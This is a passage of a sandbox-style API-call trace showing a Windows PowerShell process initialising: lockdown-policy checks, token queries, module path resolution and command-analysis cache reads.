[0280.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0280.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0280.839] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.841] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0280.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0280.841] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0280.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0280.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0280.841] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0280.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0280.841] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0280.879] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cff480 [0280.879] GetSystemDirectoryW (in: lpBuffer=0x25b73cff480, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0280.879] CoTaskMemFree (pv=0x25b73cff480) [0280.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x653ef8c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0280.880] WldpGetLockdownPolicy () returned 0x0 [0280.880] GetSystemInfo (in: lpSystemInfo=0x653ef8cb70 | out: lpSystemInfo=0x653ef8cb70*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0280.880] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8ca78 | out: phkResult=0x653ef8ca78*=0x8f4) returned 0x0 [0280.881] RegQueryValueExW (in: hKey=0x8f4, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x653ef8cac8, lpData=0x0, lpcbData=0x653ef8cac0*=0x0 | out: lpType=0x653ef8cac8*=0x0, lpData=0x0, lpcbData=0x653ef8cac0*=0x0) returned 0x2 [0280.881] RegCloseKey (hKey=0x8f4) returned 0x0 [0280.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", lpFilePart=0x0) returned 0x73 [0280.882] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfdf40 [0280.883] GetSystemDirectoryW (in: lpBuffer=0x25b73cfdf40, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0280.883] CoTaskMemFree (pv=0x25b73cfdf40) [0280.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x653ef8c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0280.883] WldpGetLockdownPolicy () returned 0x0 [0280.883] GetSystemInfo (in: lpSystemInfo=0x653ef8c9d0 | out: lpSystemInfo=0x653ef8c9d0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0280.883] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8c8d8 | out: phkResult=0x653ef8c8d8*=0x904) returned 0x0 [0280.884] RegQueryValueExW (in: hKey=0x904, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x653ef8c928, lpData=0x0, lpcbData=0x653ef8c920*=0x0 | out: lpType=0x653ef8c928*=0x0, lpData=0x0, lpcbData=0x653ef8c920*=0x0) returned 0x2 [0280.884] RegCloseKey (hKey=0x904) returned 0x0 [0280.884] CloseHandle (hObject=0x8f4) returned 1 [0280.884] CoCreateGuid (in: pguid=0x653ef8ca88 | out: pguid=0x653ef8ca88*(Data1=0xdebd9931, Data2=0x2ead, Data3=0x436d, Data4=([0]=0xb0, [1]=0xc6, [2]=0x9a, [3]=0xdc, [4]=0x20, [5]=0x40, [6]=0xe0, [7]=0x47))) returned 0x0 [0280.891] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01680 [0280.891] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x25b73d01680, nSize=0x105 | out: lpBuffer="") returned 0x97 [0280.891] CoTaskMemFree (pv=0x25b73d01680) [0280.898] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8b410, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0280.901] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfce40 [0280.901] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfce40 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0280.901] CoTaskMemFree (pv=0x25b73cfce40) [0280.902] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0280.902] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d007a0 [0280.902] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d007a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0280.902] CoTaskMemFree (pv=0x25b73d007a0) [0280.902] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d01680 [0280.902] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d01680 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0280.902] CoTaskMemFree (pv=0x25b73d01680) [0280.902] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8c530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0280.902] GetCurrentProcess () returned 0xffffffffffffffff [0280.902] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8c9e8 | out: TokenHandle=0x653ef8c9e8*=0x8f4) returned 1 [0280.902] GetTokenInformation (in: TokenHandle=0x8f4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8cae8 | out: TokenInformation=0x0, ReturnLength=0x653ef8cae8) returned 0 [0280.902] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984530 [0280.902] GetTokenInformation (in: TokenHandle=0x8f4, TokenInformationClass=0x1, TokenInformation=0x25b73984530, TokenInformationLength=0x2c, ReturnLength=0x653ef8cae8 | out: TokenInformation=0x25b73984530, ReturnLength=0x653ef8cae8) returned 1 [0280.903] LocalFree (hMem=0x25b73984530) returned 0x0 [0280.903] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c69ff28, cbSid=0x653ef8cae0 | out: pSid=0x25b5c69ff28*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8cae0) returned 1 [0280.903] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8c980*=0x904, lpdwindex=0x653ef8c754 | out: lpdwindex=0x653ef8c754) returned 0x0 [0280.904] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01680 [0280.904] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d01680, nSize=0x105 | out: lpBuffer="") returned 0x0 [0280.904] CoTaskMemFree (pv=0x25b73d01680) [0280.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", lpFilePart=0x0) returned 0x73 [0280.905] GetCurrentProcess () returned 0xffffffffffffffff [0280.905] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8cb18 | out: TokenHandle=0x653ef8cb18*=0x8fc) returned 1 [0280.905] GetTokenInformation (in: TokenHandle=0x8fc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8cc18 | out: TokenInformation=0x0, ReturnLength=0x653ef8cc18) returned 0 [0280.905] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984ef0 [0280.905] GetTokenInformation (in: TokenHandle=0x8fc, TokenInformationClass=0x1, TokenInformation=0x25b73984ef0, TokenInformationLength=0x2c, ReturnLength=0x653ef8cc18 | out: TokenInformation=0x25b73984ef0, ReturnLength=0x653ef8cc18) returned 1 [0280.906] LocalFree (hMem=0x25b73984ef0) returned 0x0 [0280.906] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c6a13a0, cbSid=0x653ef8cc10 | out: pSid=0x25b5c6a13a0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8cc10) returned 1 [0280.906] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8cab0*=0x7dc, lpdwindex=0x653ef8c884 | out: lpdwindex=0x653ef8c884) returned 0x0 [0280.908] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01680 [0280.908] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d01680, nSize=0x105 | out: lpBuffer="") returned 0x0 [0280.908] CoTaskMemFree (pv=0x25b73d01680) [0280.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", lpFilePart=0x0) returned 0x73 [0280.915] ReadFile (in: hFile=0x900, lpBuffer=0x25b5c6a8368, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c738, lpOverlapped=0x0 | out: lpBuffer=0x25b5c6a8368*, lpNumberOfBytesRead=0x653ef8c738*=0x0, lpOverlapped=0x0) returned 1 [0280.915] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cff260 [0280.915] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cff260 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0280.915] CoTaskMemFree (pv=0x25b73cff260) [0280.915] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8c460, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0280.920] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfb4c0 [0280.920] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfb4c0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0280.920] CoTaskMemFree (pv=0x25b73cfb4c0) [0280.920] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8c400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0280.928] EtwEventActivityIdControl () returned 0x0 [0280.928] SetEvent (hEvent=0x908) returned 1 [0280.928] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d330*=0x908, lpdwindex=0x653ef8d104 | out: lpdwindex=0x653ef8d104) returned 0x0 [0280.929] GetCurrentProcess () returned 0xffffffffffffffff [0280.929] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x900) returned 1 [0280.930] GetTokenInformation (in: TokenHandle=0x900, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0280.930] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739847f0 [0280.930] GetTokenInformation (in: TokenHandle=0x900, TokenInformationClass=0x1, TokenInformation=0x25b739847f0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739847f0, ReturnLength=0x653ef8d6b8) returned 1 [0280.931] LocalFree (hMem=0x25b739847f0) returned 0x0 [0280.931] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c6ccc00, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c6ccc00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0280.932] CreateMutexW (lpMutexAttributes=0x25b5c6ccd50, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x4f4 [0280.932] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x4f4, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0280.932] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0280.932] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d5b0 | out: lpFileInformation=0x653ef8d5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0280.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d490) returned 1 [0280.933] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x653ef8cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0280.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d410) returned 1 [0280.933] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4f0 [0280.933] GetFileType (hFile=0x4f0) returned 0x1 [0280.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d380) returned 1 [0280.933] GetFileType (hFile=0x4f0) returned 0x1 [0280.934] ReadFile (in: hFile=0x4f0, lpBuffer=0x25b5c6cde18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d278, lpOverlapped=0x0 | out: lpBuffer=0x25b5c6cde18*, lpNumberOfBytesRead=0x653ef8d278*=0x1000, lpOverlapped=0x0) returned 1 [0280.967] ReadFile (in: hFile=0x4f0, lpBuffer=0x25b5c6cfbfa, nNumberOfBytesToRead=0x1f, lpNumberOfBytesRead=0x653ef8cf18, lpOverlapped=0x0 | out: lpBuffer=0x25b5c6cfbfa*, lpNumberOfBytesRead=0x653ef8cf18*=0x1f, lpOverlapped=0x0) returned 1 [0280.968] ReadFile (in: hFile=0x4f0, lpBuffer=0x25b5c6cde18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8cee8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c6cde18*, lpNumberOfBytesRead=0x653ef8cee8*=0x1000, lpOverlapped=0x0) returned 1 [0280.971] ReadFile (in: hFile=0x4f0, lpBuffer=0x25b5c6cfbfc, nNumberOfBytesToRead=0x27, lpNumberOfBytesRead=0x653ef8cd98, lpOverlapped=0x0 | out: lpBuffer=0x25b5c6cfbfc*, lpNumberOfBytesRead=0x653ef8cd98*=0x27, lpOverlapped=0x0) returned 1 [0280.971] ReadFile (in: hFile=0x4f0, lpBuffer=0x25b5c6cde18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8ce38, lpOverlapped=0x0 | out: lpBuffer=0x25b5c6cde18*, lpNumberOfBytesRead=0x653ef8ce38*=0x1000, lpOverlapped=0x0) returned 1 [0280.971] ReadFile (in: hFile=0x4f0, lpBuffer=0x25b5c6cfbc8, nNumberOfBytesToRead=0x5, lpNumberOfBytesRead=0x653ef8ccf8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c6cfbc8*, lpNumberOfBytesRead=0x653ef8ccf8*=0x5, lpOverlapped=0x0) returned 1 [0280.971] ReadFile (in: hFile=0x4f0, lpBuffer=0x25b5c6cde18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8cd98, lpOverlapped=0x0 | out: lpBuffer=0x25b5c6cde18*, lpNumberOfBytesRead=0x653ef8cd98*=0x1000, lpOverlapped=0x0) returned 1 [0280.972] ReadFile (in: hFile=0x4f0, lpBuffer=0x25b5c6cfb9a, nNumberOfBytesToRead=0x1d, lpNumberOfBytesRead=0x653ef8cea8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c6cfb9a*, lpNumberOfBytesRead=0x653ef8cea8*=0x1d, lpOverlapped=0x0) returned 1 [0280.972] ReadFile (in: hFile=0x4f0, lpBuffer=0x25b5c6cde18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8cf48, lpOverlapped=0x0 | out: lpBuffer=0x25b5c6cde18*, lpNumberOfBytesRead=0x653ef8cf48*=0xc85, lpOverlapped=0x0) returned 1 [0280.972] ReadFile (in: hFile=0x4f0, lpBuffer=0x25b5c6cde18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d248, lpOverlapped=0x0 | out: lpBuffer=0x25b5c6cde18*, lpNumberOfBytesRead=0x653ef8d248*=0x0, lpOverlapped=0x0) returned 1 [0280.972] CloseHandle (hObject=0x4f0) returned 1 [0280.973] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1", lpFilePart=0x0) returned 0x73 [0280.973] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0280.973] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Security\\Microsoft.PowerShell.Security.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\microsoft.powershell.security.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c6dacb8 | out: lpFileInformation=0x25b5c6dacb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x296)) returned 1 [0280.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0280.974] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0280.974] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0280.974] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0280.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0280.974] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_cc38888a-7080-4220-9b7d-de7a9b2167ba", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_cc38888a-7080-4220-9b7d-de7a9b2167ba", lpFilePart=0x0) returned 0x93 [0280.974] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0280.974] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_cc38888a-7080-4220-9b7d-de7a9b2167ba" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_cc38888a-7080-4220-9b7d-de7a9b2167ba"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4f0 [0280.974] GetFileType (hFile=0x4f0) returned 0x1 [0280.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0280.974] GetFileType (hFile=0x4f0) returned 0x1 [0280.975] ReadFile (in: hFile=0x4f0, lpBuffer=0x25b5c6dbfb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c6dbfb8*, lpNumberOfBytesRead=0x653ef8d338*=0x717, lpOverlapped=0x0) returned 1 [0280.975] ReadFile (in: hFile=0x4f0, lpBuffer=0x25b5c6dbfb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c6dbfb8*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0280.975] CloseHandle (hObject=0x4f0) returned 1 [0280.975] ReleaseMutex (hMutex=0x4f4) returned 1 [0280.975] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77 [0280.976] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfcc20 [0280.976] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfcc20, nSize=0x105 | out: lpBuffer="") returned 0x0 [0280.976] CoTaskMemFree (pv=0x25b73cfcc20) [0280.976] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d007a0 [0280.976] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d007a0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0280.976] CoTaskMemFree (pv=0x25b73d007a0) [0280.976] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0280.976] GetCurrentProcess () returned 0xffffffffffffffff [0280.976] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x4f0) returned 1 [0280.976] GetTokenInformation (in: TokenHandle=0x4f0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0280.976] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984af0 [0280.977] GetTokenInformation (in: TokenHandle=0x4f0, TokenInformationClass=0x1, 